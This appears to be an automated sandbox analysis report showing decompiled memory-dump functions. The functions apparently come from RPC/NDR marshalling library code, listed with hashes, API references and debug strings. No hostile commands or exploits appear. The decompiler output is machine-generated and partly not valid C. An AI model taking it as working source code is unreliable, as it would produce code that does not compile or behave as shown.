                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: buffer overflow %d bytes$buffer=%d/%d$byte=%d => %p$double=%f => %p$enum16=%d => %p$float=%f => %p$long=%d => %p$longlong=%s => %p$pointer => %p$short=%d => %p
                                                                                                • API String ID: 3997070919-1168472477
                                                                                                • Opcode ID: ef7247fcddefc51af157166d13ee9a8e64d55d37e59f7942fa2636bd298bb3bf
                                                                                                • Instruction ID: 3ab9e24cfc454bc01401883f2439e54d7f1c914600576aedb73d0680017724af
                                                                                                • Opcode Fuzzy Hash: ef7247fcddefc51af157166d13ee9a8e64d55d37e59f7942fa2636bd298bb3bf
                                                                                                • Instruction Fuzzy Hash: 90C12AB5A00109AFCB04CF99E890EAA7BB5AF89314F04C519FA594F345E731EB51CFA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDA3600, Relevance: 17.7, APIs: 4, Strings: 6, Instructions: 193COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 29%
                                                                                                			E6EDA3600(intOrPtr _a4, signed int* _a8, signed char* _a12, signed int _a16) {
				signed char* _v8;
				intOrPtr _v12;
				signed char* _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _t94;
				intOrPtr _t98;
				signed int _t115;
				signed char* _t132;
				signed char* _t160;
				void* _t178;
				void* _t179;
				void* _t183;
				void* _t184;

				_v8 = _a12;
				0x6eda0000("(%p, %p, %p, %d)\n", _a4, _a8, _a12, _a16 & 0x000000ff);
				_t179 = _t178 + 0x14;
				_a12 = _a12 + 6;
				if(( *_v8 & 0x000000ff) != 0x18 && ( *_v8 & 0x000000ff) != 0x17) {
					0x6eda0000("invalid format type %x\n",  *_v8 & 0x000000ff);
					__imp__RpcRaiseException(0x6e6);
					return 0;
				}
				_v16 =  &(_v8[_v8[4] + 4]);
				__eflags = ( *_v16 & 0x000000ff) - 0x1b;
				if(__eflags == 0) {
					_v24 = _v16[2] & 0x0000ffff;
					_v16 = E6EDAA460( &(_v16[4]), __eflags, _a4,  &(_v16[4]));
					E6EDA73D0((_v8[1] & 0x000000ff) + 1, _a4 + 4, (_v8[1] & 0x000000ff) + 1);
					0x6eda0000("memory_size = %d\n", _v8[2] & 0x0000ffff);
					_t94 = E6EDAAEC0(_v24,  *((intOrPtr*)(_a4 + 0x3c)));
					_t183 = _t179 + 0x20;
					_v12 = _t94;
					_t160 = _v8;
					_t132 = _v8;
					__eflags = ( *(_t160 + 2) & 0x0000ffff) + _v12 - ( *(_t132 + 2) & 0x0000ffff);
					if(( *(_t160 + 2) & 0x0000ffff) + _v12 < ( *(_t132 + 2) & 0x0000ffff)) {
						0x6eda0000("integer overflow of memory_size %u with bufsize %u\n", _v8[2] & 0x0000ffff, _v12);
						_t183 = _t183 + 0xc;
						__imp__RpcRaiseException(0x6f7);
					}
					__eflags = _a16 & 0x000000ff;
					if((_a16 & 0x000000ff) == 0) {
						_t98 = _a4;
						__eflags =  *(_t98 + 0x20) & 0x000000ff;
						if(( *(_t98 + 0x20) & 0x000000ff) == 0) {
							__eflags =  *_a8;
							if( *_a8 == 0) {
								 *_a8 =  *(_a4 + 4);
							}
						}
					} else {
						_v28 = (_v8[2] & 0x0000ffff) + _v12;
						_t115 = E6EDAA3B0(_a4, _a4, _v28);
						_t183 = _t183 + 8;
						 *_a8 = _t115;
					}
					 *(_a4 + 0x10) =  *(_a4 + 4);
					_v20 =  *(_a4 + 0x10);
					E6EDAAF00(_a4, (_v8[2] & 0x0000ffff) + _v12);
					_t184 = _t183 + 8;
					__eflags = ( *_v8 & 0x000000ff) - 0x18;
					if(( *_v8 & 0x000000ff) == 0x18) {
						E6EDAC2B0(_a4, _v20,  *_a8, _a12, _a16 & 0x000000ff);
						_t184 = _t184 + 0x14;
					}
					0x6eda0000("copying %p to %p\n", _v20,  *_a8);
					__eflags =  *_a8 - _v20;
					if( *_a8 != _v20) {
						__eflags = (_v8[2] & 0x0000ffff) + _v12;
						E6EDB0120( *_a8, _v20, (_v8[2] & 0x0000ffff) + _v12);
					}
					__eflags = 0;
					return 0;
				} else {
					0x6eda0000("invalid array format type %x\n",  *_v8 & 0x000000ff);
					__imp__RpcRaiseException(0x6e6);
					return 0;
				}
			}


















                                                                                                0x6eda3609
                                                                                                0x6eda3622
                                                                                                0x6eda3627
                                                                                                0x6eda3630
                                                                                                0x6eda363c
                                                                                                0x6eda3655
                                                                                                0x6eda3662
                                                                                                0x00000000
                                                                                                0x6eda3668
                                                                                                0x6eda367d
                                                                                                0x6eda3686
                                                                                                0x6eda3689
                                                                                                0x6eda36b8
                                                                                                0x6eda36ce
                                                                                                0x6eda36e3
                                                                                                0x6eda36f8
                                                                                                0x6eda370b
                                                                                                0x6eda3710
                                                                                                0x6eda3713
                                                                                                0x6eda3716
                                                                                                0x6eda3720
                                                                                                0x6eda3727
                                                                                                0x6eda3729
                                                                                                0x6eda373c
                                                                                                0x6eda3741
                                                                                                0x6eda3749
                                                                                                0x6eda3749
                                                                                                0x6eda3753
                                                                                                0x6eda3755
                                                                                                0x6eda377b
                                                                                                0x6eda3782
                                                                                                0x6eda3784
                                                                                                0x6eda3789
                                                                                                0x6eda378c
                                                                                                0x6eda3797
                                                                                                0x6eda3797
                                                                                                0x6eda378c
                                                                                                0x6eda3757
                                                                                                0x6eda3761
                                                                                                0x6eda376c
                                                                                                0x6eda3771
                                                                                                0x6eda3777
                                                                                                0x6eda3777
                                                                                                0x6eda37a2
                                                                                                0x6eda37ab
                                                                                                0x6eda37bd
                                                                                                0x6eda37c2
                                                                                                0x6eda37cb
                                                                                                0x6eda37ce
                                                                                                0x6eda37e7
                                                                                                0x6eda37ec
                                                                                                0x6eda37ec
                                                                                                0x6eda37fe
                                                                                                0x6eda380b
                                                                                                0x6eda380e
                                                                                                0x6eda3817
                                                                                                0x6eda3825
                                                                                                0x6eda382a
                                                                                                0x6eda382d
                                                                                                0x00000000
                                                                                                0x6eda368b
                                                                                                0x6eda3697
                                                                                                0x6eda36a4
                                                                                                0x00000000
                                                                                                0x6eda36aa

                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006E6), ref: 6EDA3662
                                                                                                • RpcRaiseException.RPCRT4(000006E6), ref: 6EDA36A4
                                                                                                • RpcRaiseException.RPCRT4(000006F7), ref: 6EDA3749
                                                                                                Strings
                                                                                                • integer overflow of memory_size %u with bufsize %u, xrefs: 6EDA3737
                                                                                                • (%p, %p, %p, %d), xrefs: 6EDA361D
                                                                                                • invalid format type %x, xrefs: 6EDA3650
                                                                                                • memory_size = %d, xrefs: 6EDA36F3
                                                                                                • copying %p to %p, xrefs: 6EDA37F9
                                                                                                • invalid array format type %x, xrefs: 6EDA3692
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: (%p, %p, %p, %d)$copying %p to %p$integer overflow of memory_size %u with bufsize %u$invalid array format type %x$invalid format type %x$memory_size = %d
                                                                                                • API String ID: 3997070919-1713900660
                                                                                                • Opcode ID: fc3c5fdb91aa7de844fcab53730f88c2eac2357819e894467bd5b4b949fa77b3
                                                                                                • Instruction ID: 9a40063eab00470a82aad4c60786b112326965a51d3e9264e2a3b6cff0b3658c
                                                                                                • Opcode Fuzzy Hash: fc3c5fdb91aa7de844fcab53730f88c2eac2357819e894467bd5b4b949fa77b3
                                                                                                • Instruction Fuzzy Hash: 237151B5A00104EFCB44CFD8D890DAEBBB6AF89205F148589F9599B341E330EF51CBA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDA3840, Relevance: 16.0, APIs: 3, Strings: 6, Instructions: 212COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 37%
                                                                                                			E6EDA3840(intOrPtr _a4, intOrPtr* _a8, signed char* _a12, signed int _a16) {
				signed char* _v8;
				signed char* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				intOrPtr _v40;
				intOrPtr* _t124;
				void* _t126;
				intOrPtr _t129;
				void* _t133;
				void* _t197;
				void* _t198;
				void* _t199;
				void* _t200;
				void* _t203;

				_v8 = _a12;
				0x6eda0000("(%p, %p, %p, %d)\n", _a4, _a8, _a12, _a16 & 0x000000ff);
				_t200 = _t199 + 0x14;
				_a12 = _a12 + 6;
				if(( *_v8 & 0x000000ff) == 0x19) {
					_v12 =  &(_v8[_v8[4] + 4]);
					_v28 = E6EDAD650( *_v12 & 0x000000ff, _a4, _v12);
					E6EDA73D0((_v8[1] & 0x000000ff) + 1, _a4 + 4, (_v8[1] & 0x000000ff) + 1);
					0x6eda0000("memory_size = %d\n", _v8[2] & 0x0000ffff);
					_t203 = _t200 + 0x1c;
					if((_a16 & 0x000000ff) == 0 &&  *_a8 == 0) {
						_a16 = 1;
					}
					if((_a16 & 0x000000ff) != 0) {
						_v32 = (_v8[2] & 0x0000ffff) + _v28;
						_t129 = E6EDAA3B0(_v32, _a4, _v32);
						_t203 = _t203 + 8;
						 *_a8 = _t129;
					}
					 *((intOrPtr*)(_a4 + 0x10)) =  *((intOrPtr*)(_a4 + 4));
					_v16 =  *((intOrPtr*)(_a4 + 0x10));
					E6EDAAF00(_a4, _v8[2] & 0x0000ffff);
					_v36 = (_v8[2] & 0x0000ffff) +  *_a8;
					_v20 = E6EDAD830(_t133, _t197, _t198,  *_v12 & 0x000000ff, _a4,  &_v36, _v12, 0, 0, 0);
					_v40 =  *((intOrPtr*)(_a4 + 0x40));
					_v24 =  *((intOrPtr*)(_a4 + 4));
					E6EDAAF00(_a4, _v20);
					E6EDAC2B0(_a4, _v16,  *_a8, _a12, _a16 & 0x000000ff);
					E6EDB0120( *_a8, _v16, _v8[2] & 0x0000ffff);
					0x6eda0000("copying %p to %p\n", _v24, (_v8[2] & 0x0000ffff) +  *_a8);
					E6EDB0120( *_a8 + (_v8[2] & 0x0000ffff) + _v40, _v24, _v20);
					if(( *_v12 & 0x000000ff) != 0x22) {
						if(( *_v12 & 0x000000ff) == 0x25) {
							_t124 = _a8;
							0x6eda0000((_v8[2] & 0x0000ffff) +  *_t124);
							0x6eda0000("string=%s\n", _t124);
						}
					} else {
						_t126 = (_v8[2] & 0x0000ffff) +  *_a8;
						0x6eda0000(_t126);
						0x6eda0000("string=%s\n", _t126);
					}
					return 0;
				}
				0x6eda0000("invalid format type %x\n",  *_v8 & 0x000000ff);
				__imp__RpcRaiseException(0x6e6);
				return 0;
			}





















                                                                                                0x6eda3849
                                                                                                0x6eda3862
                                                                                                0x6eda3867
                                                                                                0x6eda3870
                                                                                                0x6eda387c
                                                                                                0x6eda38b2
                                                                                                0x6eda38cc
                                                                                                0x6eda38e1
                                                                                                0x6eda38f6
                                                                                                0x6eda38fb
                                                                                                0x6eda3904
                                                                                                0x6eda390e
                                                                                                0x6eda390e
                                                                                                0x6eda3918
                                                                                                0x6eda3924
                                                                                                0x6eda392f
                                                                                                0x6eda3934
                                                                                                0x6eda393a
                                                                                                0x6eda393a
                                                                                                0x6eda3945
                                                                                                0x6eda394e
                                                                                                0x6eda395d
                                                                                                0x6eda3971
                                                                                                0x6eda3995
                                                                                                0x6eda399e
                                                                                                0x6eda39a7
                                                                                                0x6eda39b2
                                                                                                0x6eda39d1
                                                                                                0x6eda39eb
                                                                                                0x6eda3a09
                                                                                                0x6eda3a2b
                                                                                                0x6eda3a3c
                                                                                                0x6eda3a6c
                                                                                                0x6eda3a75
                                                                                                0x6eda3a7b
                                                                                                0x6eda3a89
                                                                                                0x6eda3a8e
                                                                                                0x6eda3a3e
                                                                                                0x6eda3a48
                                                                                                0x6eda3a4b
                                                                                                0x6eda3a59
                                                                                                0x6eda3a5e
                                                                                                0x00000000
                                                                                                0x6eda3a91
                                                                                                0x6eda388a
                                                                                                0x6eda3897
                                                                                                0x00000000

                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006E6), ref: 6EDA3897
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: (%p, %p, %p, %d)$copying %p to %p$invalid format type %x$memory_size = %d$string=%s$string=%s
                                                                                                • API String ID: 3997070919-4074488482
                                                                                                • Opcode ID: 33550d3d5dd4f3c112987691ef2da349e02b4af40054ac62c638130a24e7c18d
                                                                                                • Instruction ID: 53046799e6fba79498dbed2e33f2992f672a3675a399e9a0241d6effa83ea30e
                                                                                                • Opcode Fuzzy Hash: 33550d3d5dd4f3c112987691ef2da349e02b4af40054ac62c638130a24e7c18d
                                                                                                • Instruction Fuzzy Hash: D18140B5900118AFCB04CF98D890DAEB7BAAF89305F14C558F9499B345E734EF50DBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDABB90, Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 200COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (%p,%p,%p)$deref$no memorysizer for data type=%02x$pointer_id is 0x%08x$pointer_id is 0x%08x$type=0x%x, attr=$unhandled ptr type=%02x
                                                                                                • API String ID: 0-2530590018
                                                                                                • Opcode ID: 168ba1c1671128bef0c91a99aa72716ac3b3159baf19d2b2fd5908499e66562c
                                                                                                • Instruction ID: 8cc043684050ab8694825ff5ab123ee0344bc8afec5fc960e8451d14a5a4e516
                                                                                                • Opcode Fuzzy Hash: 168ba1c1671128bef0c91a99aa72716ac3b3159baf19d2b2fd5908499e66562c
                                                                                                • Instruction Fuzzy Hash: 768102B190416A9FDB04CF99C841BBDBBB1EF85301F048169F9959B2C5D338DB51DBA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDA74D0, Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 187COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 37%
                                                                                                			E6EDA74D0(signed int _a4, signed short* _a8, signed char* _a12) {
				char _v8;
				signed int _v12;
				signed int _v16;

				0x6eda0000("pStubMsg %p, pMemory %p, type 0x%02x\n", _a4, _a8,  *_a12 & 0x000000ff);
				_v12 =  *_a12 & 0x000000ff;
				_v12 = _v12 - 1;
				if(_v12 > 0xb8) {
					L13:
					0x6eda0000("Unhandled base type: 0x%02x\n",  *_a12 & 0x000000ff);
				} else {
					_t10 = _v12 + 0x6eda7728; // 0xcccccc08
					switch( *((intOrPtr*)(( *_t10 & 0x000000ff) * 4 +  &M6EDA7700))) {
						case 0:
							E6EDAB030(_a4, _a8, 1);
							_push( *_a8 & 0x000000ff);
							_push("value: 0x%02x\n");
							0x6eda0000();
							goto L14;
						case 1:
							__ecx = _a4;
							__ecx = _a4 + 4;
							__eax = E6EDA7400(_a4 + 4, _a4 + 4, 2);
							__edx = _a8;
							_a4 = E6EDAB030(_a4, _a8, 2);
							__ecx = _a8;
							__edx =  *_a8 & 0x0000ffff;
							_push( *_a8 & 0x0000ffff);
							_push("value: 0x%04x\n");
							0x6eda0000();
							__esp = __esp + 8;
							goto L14;
						case 2:
							_a4 = _a4 + 4;
							__eax = E6EDA7400(__ecx, _a4 + 4, 4);
							__ecx = _a8;
							__edx = _a4;
							E6EDAB030(_a4, _a8, 4) = _a8;
							__ecx =  *_a8;
							_push( *_a8);
							_push("value: 0x%08x\n");
							0x6eda0000();
							__esp = __esp + 8;
							goto L14;
						case 3:
							_a4 = _a4 + 4;
							E6EDA7400(__ecx, _a4 + 4, 4) = _a8;
							__ecx = _a4;
							__eax = E6EDAB030(_a4, _a8, 4);
							goto L14;
						case 4:
							_a4 = _a4 + 4;
							E6EDA7400(__ecx, _a4 + 4, 8) = _a8;
							__ecx = _a4;
							__eax = E6EDAB030(_a4, _a8, 8);
							__edx = _a8;
							__eax =  *(__edx + 4);
							_push(__eax);
							__ecx =  *__edx;
							_push( *__edx);
							0x6eda0000();
							__esp = __esp + 8;
							_push(__eax);
							_push("value: %s\n");
							0x6eda0000();
							__esp = __esp + 8;
							goto L14;
						case 5:
							_a4 = _a4 + 4;
							E6EDA7400(__ecx, _a4 + 4, 8) = _a8;
							__ecx = _a4;
							__eax = E6EDAB030(_a4, _a8, 8);
							goto L14;
						case 6:
							__edx = _a8;
							_v8 =  *_a8;
							__ecx = _a8;
							if( *__ecx > 0x7fff) {
								_push(0x6f5);
								__imp__RpcRaiseException();
							}
							_a4 = _a4 + 4;
							E6EDA7400(__ecx, _a4 + 4, 2) =  &_v8;
							__ecx = _a4;
							__eax = E6EDAB030(_a4,  &_v8, 2);
							__edx = _a8;
							__eax =  *_a8;
							_push( *_a8);
							_push("value: 0x%04x\n");
							0x6eda0000();
							__esp = __esp + 8;
							goto L14;
						case 7:
							goto L14;
						case 8:
							__ecx = _a8;
							__edx =  *__ecx;
							_v16 =  *__ecx;
							_a4 = _a4 + 4;
							__eax = E6EDA7400(__ecx, _a4 + 4, 4);
							__ecx =  &_v16;
							__edx = _a4;
							__eax = E6EDAB030(_a4,  &_v16, 4);
							goto L14;
						case 9:
							goto L13;
					}
				}
				L14:
				return 0;
			}






                                                                                                0x6eda74ea
                                                                                                0x6eda74f8
                                                                                                0x6eda7501
                                                                                                0x6eda750b
                                                                                                0x6eda76e3
                                                                                                0x6eda76ef
                                                                                                0x6eda7511
                                                                                                0x6eda7514
                                                                                                0x6eda751b
                                                                                                0x00000000
                                                                                                0x6eda752c
                                                                                                0x6eda753a
                                                                                                0x6eda753b
                                                                                                0x6eda7540
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6eda754f
                                                                                                0x6eda7552
                                                                                                0x6eda7556
                                                                                                0x6eda7560
                                                                                                0x6eda7568
                                                                                                0x6eda7570
                                                                                                0x6eda7573
                                                                                                0x6eda7576
                                                                                                0x6eda7577
                                                                                                0x6eda757c
                                                                                                0x6eda7581
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6eda758e
                                                                                                0x6eda7592
                                                                                                0x6eda759c
                                                                                                0x6eda75a0
                                                                                                0x6eda75ac
                                                                                                0x6eda75af
                                                                                                0x6eda75b1
                                                                                                0x6eda75b2
                                                                                                0x6eda75b7
                                                                                                0x6eda75bc
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6eda75c9
                                                                                                0x6eda75d7
                                                                                                0x6eda75db
                                                                                                0x6eda75df
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6eda7619
                                                                                                0x6eda7627
                                                                                                0x6eda762b
                                                                                                0x6eda762f
                                                                                                0x6eda7637
                                                                                                0x6eda763a
                                                                                                0x6eda763d
                                                                                                0x6eda763e
                                                                                                0x6eda7640
                                                                                                0x6eda7641
                                                                                                0x6eda7646
                                                                                                0x6eda7649
                                                                                                0x6eda764a
                                                                                                0x6eda764f
                                                                                                0x6eda7654
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6eda75f1
                                                                                                0x6eda75ff
                                                                                                0x6eda7603
                                                                                                0x6eda7607
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6eda765c
                                                                                                0x6eda7662
                                                                                                0x6eda7666
                                                                                                0x6eda766f
                                                                                                0x6eda7671
                                                                                                0x6eda7676
                                                                                                0x6eda7676
                                                                                                0x6eda7681
                                                                                                0x6eda768f
                                                                                                0x6eda7693
                                                                                                0x6eda7697
                                                                                                0x6eda769f
                                                                                                0x6eda76a2
                                                                                                0x6eda76a4
                                                                                                0x6eda76a5
                                                                                                0x6eda76aa
                                                                                                0x6eda76af
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6eda76b4
                                                                                                0x6eda76b7
                                                                                                0x6eda76b9
                                                                                                0x6eda76c1
                                                                                                0x6eda76c5
                                                                                                0x6eda76cf
                                                                                                0x6eda76d3
                                                                                                0x6eda76d7
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6eda751b
                                                                                                0x6eda76f7
                                                                                                0x6eda76fc

                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006F5), ref: 6EDA7676
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: Unhandled base type: 0x%02x$pStubMsg %p, pMemory %p, type 0x%02x$value: %s$value: 0x%02x$value: 0x%04x$value: 0x%04x$value: 0x%08x
                                                                                                • API String ID: 3997070919-2832912556
                                                                                                • Opcode ID: db775fc221c625dba6cf69c8b24416b0ed65143970ac05acb48e83d706034bb5
                                                                                                • Instruction ID: 12f2b26af8df171ee9151ef0d0a5421d2890b2b2c6847000333e7a69674bf0fe
                                                                                                • Opcode Fuzzy Hash: db775fc221c625dba6cf69c8b24416b0ed65143970ac05acb48e83d706034bb5
                                                                                                • Instruction Fuzzy Hash: F2518DF9A00108BBD700CFACDC41FA93B69AB85349F04C418FF599B385E676E7158BA5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDADAD3, Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 166memoryCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 21%
                                                                                                			E6EDADAD3() {
				intOrPtr _t75;
				signed int _t80;
				intOrPtr* _t81;
				intOrPtr _t84;
				intOrPtr _t88;
				void* _t134;
				void* _t136;
				void* _t137;

				if(( *(_t134 + 8) & 0x000000ff) != 0x22) {
					 *(_t134 - 8) = 2;
				} else {
					 *(_t134 - 8) = 1;
				}
				E6EDAA540( *((intOrPtr*)( *((intOrPtr*)(_t134 + 0xc)) + 0x3c)),  *((intOrPtr*)(_t134 + 0xc)), 0,  *((intOrPtr*)( *((intOrPtr*)(_t134 + 0xc)) + 0x3c)));
				_t137 = _t136 + 0xc;
				if((( *(_t134 + 0x14))[1] & 0x000000ff) != 0x44 &&  *((intOrPtr*)( *((intOrPtr*)(_t134 + 0xc)) + 0x3c)) !=  *((intOrPtr*)( *((intOrPtr*)(_t134 + 0xc)) + 0x44))) {
					0x6eda0000("buffer size %d must equal memory size %ld for non-sized conformant strings\n",  *((intOrPtr*)( *((intOrPtr*)(_t134 + 0xc)) + 0x44)),  *((intOrPtr*)( *((intOrPtr*)(_t134 + 0xc)) + 0x3c)));
					_t137 = _t137 + 0xc;
					__imp__RpcRaiseException(0x6c6);
				}
				if( *((intOrPtr*)( *((intOrPtr*)(_t134 + 0xc)) + 0x40)) != 0) {
					0x6eda0000("conformant strings can\'t have Offset (%d)\n",  *((intOrPtr*)( *((intOrPtr*)(_t134 + 0xc)) + 0x40)));
					_t137 = _t137 + 8;
					__imp__RpcRaiseException(0x6c6);
				}
				 *((intOrPtr*)(_t134 - 0x14)) = E6EDAAEC0( *(_t134 - 8) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)(_t134 + 0xc)) + 0x3c)));
				 *((intOrPtr*)(_t134 - 0xc)) = E6EDAAEC0( *(_t134 - 8) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)(_t134 + 0xc)) + 0x44)));
				E6EDAB0C0( *(_t134 - 8) & 0x0000ffff,  *((intOrPtr*)(_t134 + 0xc)),  *((intOrPtr*)(_t134 - 0xc)),  *(_t134 - 8) & 0x0000ffff);
				if(( *(_t134 + 0x20) & 0x000000ff) != 0) {
					if(( *(_t134 + 0x18) & 0x000000ff) == 0) {
						if(( *(_t134 + 0x1c) & 0x000000ff) == 0 || ( *( *((intOrPtr*)(_t134 + 0xc)) + 0x20) & 0x000000ff) != 0 ||  *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x10)))) != 0 ||  *((intOrPtr*)( *((intOrPtr*)(_t134 + 0xc)) + 0x3c)) !=  *((intOrPtr*)( *((intOrPtr*)(_t134 + 0xc)) + 0x44))) {
							if( *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x10)))) == 0) {
								_t84 =  *((intOrPtr*)(_t134 + 0xc));
								__imp__NdrAllocate(_t84,  *((intOrPtr*)(_t134 - 0x14)));
								 *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x10)))) = _t84;
							}
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x10)))) =  *((intOrPtr*)( *((intOrPtr*)(_t134 + 0xc)) + 4));
						}
					} else {
						_t88 =  *((intOrPtr*)(_t134 - 0x14));
						__imp__NdrAllocate( *((intOrPtr*)(_t134 + 0xc)), _t88);
						 *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x10)))) = _t88;
					}
					if( *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x10)))) !=  *((intOrPtr*)( *((intOrPtr*)(_t134 + 0xc)) + 4))) {
						E6EDAAFA0( *((intOrPtr*)(_t134 + 0xc)),  *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x10)))),  *((intOrPtr*)(_t134 - 0xc)));
					} else {
						E6EDAAF00( *((intOrPtr*)(_t134 + 0xc)),  *((intOrPtr*)(_t134 - 0xc)));
					}
					_t80 =  *( *(_t134 + 0x14)) & 0x000000ff;
					if(_t80 != 0x22) {
						_t81 =  *((intOrPtr*)(_t134 + 0x10));
						0x6eda0000( *_t81);
						0x6eda0000("string=%s\n", _t81);
					} else {
						0x6eda0000( *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x10)))));
						0x6eda0000("string=%s\n", _t80);
					}
				}
				_t75 =  *((intOrPtr*)(_t134 - 0xc));
				return _t75;
			}











                                                                                                0x6edadada
                                                                                                0x6edadaec
                                                                                                0x6edadadc
                                                                                                0x6edadae1
                                                                                                0x6edadae1
                                                                                                0x6edadafd
                                                                                                0x6edadb02
                                                                                                0x6edadb17
                                                                                                0x6edadb3a
                                                                                                0x6edadb3f
                                                                                                0x6edadb47
                                                                                                0x6edadb47
                                                                                                0x6edadb54
                                                                                                0x6edadb62
                                                                                                0x6edadb67
                                                                                                0x6edadb6f
                                                                                                0x6edadb6f
                                                                                                0x6edadb89
                                                                                                0x6edadba0
                                                                                                0x6edadbb0
                                                                                                0x6edadbbe
                                                                                                0x6edadbca
                                                                                                0x6edadbe7
